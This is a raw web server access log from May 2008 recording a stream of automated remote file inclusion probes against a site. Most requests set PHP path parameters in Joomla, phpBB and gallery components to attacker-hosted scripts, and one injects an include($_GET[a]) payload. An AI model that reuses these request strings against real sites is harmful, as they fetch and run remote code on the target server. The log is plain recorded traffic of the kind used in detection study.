69.89.31.102 - - [19/May/2008:10:41:50 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.114.220.160 - - [19/May/2008:10:41:53 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cyos.co.kr/bbs//skin/zero_vote/10.gif?? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
213.251.149.21 - - [19/May/2008:10:42:01 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:42:13 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:42:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.165.110.84 - - [19/May/2008:10:42:19 -0700] "GET /logs/access.log/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:42:20 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
219.165.110.84 - - [19/May/2008:10:42:25 -0700] "GET /logs/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.165.110.84 - - [19/May/2008:10:42:30 -0700] "GET /index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:42:38 -0700] "GET /logs/%0312%%031%02DORK%0315%02:%0314http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:42:38 -0700] "GET /%0312%%031%02DORK%0315%02:%0314http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
210.17.188.208 - - [19/May/2008:10:42:58 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:43:25 -0700] "GET /logs/access_080327.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:43:48 -0700] "GET /logs/access_080327.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.149.175.25 - - [19/May/2008:10:44:20 -0700] "GET /logs/access_080218.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
192.71.5.22 - - [19/May/2008:10:44:20 -0700] "GET /logs/access_080213.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://poko.as.ro/s/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
192.71.5.22 - - [19/May/2008:10:44:21 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://poko.as.ro/s/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
192.71.5.22 - - [19/May/2008:10:44:21 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://poko.as.ro/s/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.33.45 - - [19/May/2008:10:44:33 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:44:40 -0700] "GET /logs/access_080327.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:44:42 -0700] "GET /logs/access_080327.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:44:50 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:45:08 -0700] "GET /logs/access_080405.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:45:09 -0700] "GET /logs/access_080405.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.21.85.101 - - [19/May/2008:10:45:09 -0700] "GET /logs/access_080105.log//shoutbox/expanded.php?conf=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [19/May/2008:10:45:10 -0700] "GET //shoutbox/expanded.php?conf=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [19/May/2008:10:45:11 -0700] "GET /logs//shoutbox/expanded.php?conf=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:45:13 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:45:15 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:10:45:17 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:45:19 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 200 11591 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:45:20 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
62.149.175.25 - - [19/May/2008:10:45:37 -0700] "GET /logs/access_080327.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:45:44 -0700] "GET /logs/access_080327.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:45:49 -0700] "GET /logs/access_080327.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:45:51 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:46:01 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:46:04 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:46:05 -0700] "GET /modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:46:05 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:46:38 -0700] "GET /logs/access.log//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:46:44 -0700] "GET /logs/access.log//rgboard/include/bbs.lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:46:44 -0700] "GET /logs//rgboard/include/bbs.lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.165.110.84 - - [19/May/2008:10:46:47 -0700] "GET /logs/access_071225.log/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:46:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:46:52 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:47:27 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:47:30 -0700] "GET /logs/access_080107.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:47:35 -0700] "GET /logs/access_080107.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:47:43 -0700] "GET /logs/access_080107.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:47:47 -0700] "GET /logs/access_080107.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:47:53 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:10:48:06 -0700] "GET /logs/access_080107.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:48:19 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:48:19 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:48:24 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:10:48:27 -0700] "GET /logs/access_080221.log///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:10:48:27 -0700] "GET ///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:10:48:28 -0700] "GET /logs///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [19/May/2008:10:48:42 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [19/May/2008:10:48:42 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:49:08 -0700] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:49:48 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:49:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.165.110.84 - - [19/May/2008:10:49:59 -0700] "GET /index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.215.106 - - [19/May/2008:10:50:01 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://chapolin.itrello.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.106 - - [19/May/2008:10:50:03 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://chapolin.itrello.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:50:07 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:50:07 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.71.5.22 - - [19/May/2008:10:50:14 -0700] "GET /logs/access_080218.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://poko.as.ro/s/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.21.85.101 - - [19/May/2008:10:50:16 -0700] "GET /logs//shoutbox/expanded.php?conf=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:50:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.21.85.101 - - [19/May/2008:10:50:16 -0700] "GET //shoutbox/expanded.php?conf=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:50:19 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:50:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:51:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:51:16 -0700] "GET /belegungsplan/tagesuebersicht.inc.php?root=http://freewebs.com/alb_rinia/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:51:26 -0700] "GET /logs/belegungsplan/tagesuebersicht.inc.php?root=http://freewebs.com/alb_rinia/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
210.17.188.208 - - [19/May/2008:10:51:30 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:10:51:46 -0700] "GET //s01.php?shopid=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:51:49 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:51:50 -0700] "GET /modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:51:50 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:51:51 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:51:52 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:52:05 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:52:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:52:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:10:52:07 -0700] "GET /logs/access_080327.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.119.2 - - [19/May/2008:10:52:12 -0700] "GET /logs/access_080226.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.119.2 - - [19/May/2008:10:52:12 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:52:16 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:52:16 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:52:16 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:52:40 -0700] "GET /phfito/phfito-post?SRC_PATH=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:52:40 -0700] "GET /logs/phfito/phfito-post?SRC_PATH=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:53:14 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:53:56 -0700] "GET //send_reminders.php?includedir=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.60 - - [19/May/2008:10:54:09 -0700] "GET /minamijewelry/html/kids.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:10:54:45 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:10:54:45 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:55:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.21.85.101 - - [19/May/2008:10:55:16 -0700] "GET //shoutbox/expanded.php?conf=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:55:38 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:55:39 -0700] "GET /modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:55:39 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.150 - - [19/May/2008:10:55:45 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [19/May/2008:10:55:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
